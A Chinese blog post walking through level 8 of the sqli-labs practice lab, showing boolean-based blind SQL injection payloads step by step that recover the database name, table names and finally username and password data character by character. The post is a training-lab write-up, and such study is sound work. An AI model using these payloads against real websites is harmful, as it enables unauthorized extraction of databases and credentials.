0
点赞
收藏
分享

微信扫一扫

布尔型盲注(sqli第八关)

飞鸟不急 2022-04-21 阅读 72
sql

1.求闭合字符

 

 

 

由此可以判断是单引号闭合字符

2.求当前数据库名的长度 二分法

?id=1’ and length(database())=8

 

 

 

 

数据库名的长度为8

3.求当前数据库名对应的ASCII值

?Id=1’ and ascii(substr(database(),1,1))=115

 

 

 

 

 

 

数据库名第一个字符对应的ASCII值为 115  s 

数据库名第二个字符对应的ASCII值为101  e 

数据库名第三个字符对应的ASCII值为99  c

数据库名第四个字符对应的ASCII值为117  u

可以得出数据库名为 security

4.求表的数量

?Id-1’ and (select count(table_name) from information_schema.tables where table_schema=’’)=4

数据库里有4个表

 

  1. 求表名的长度

6.求表名对应的ASCII值

Id=1’ and ascii(substr((select table_name from information_schema.tables where table_schema=’’ limit 0,1),1,1))=101

第一个表的第一个ASCII值为 101  e

第一个表的第二个字符的ASCII值为 109  m

第一个表的第三个字符的ASCII值为 97  a

第一个表的第四个字符的ASCII值为 105  i

第一个表的第五个字符的ASCII值为 108  l

第一个表的第六个字符的ASCII值为 115  s

所以第一个表的名字为 emails

7.求列的数量

Id=1’ and (select count(column_name)from information_schema.columns where table_schema=’’ and table_name=’’)=3

8.求字段的数量

Id=1’ and (select count(username) from security.users)=13

11.求字段内容的长度

与上面的求法一样

12.求字段内容对应的ASCII值

Id=1’ and ascii(substr((select concat(username,0x23,password) from security.users  limit 0,1),1,1))=68

第一行的第一个字符的ASCII值为 68 D

 

 

 

举报

相关推荐

0 条评论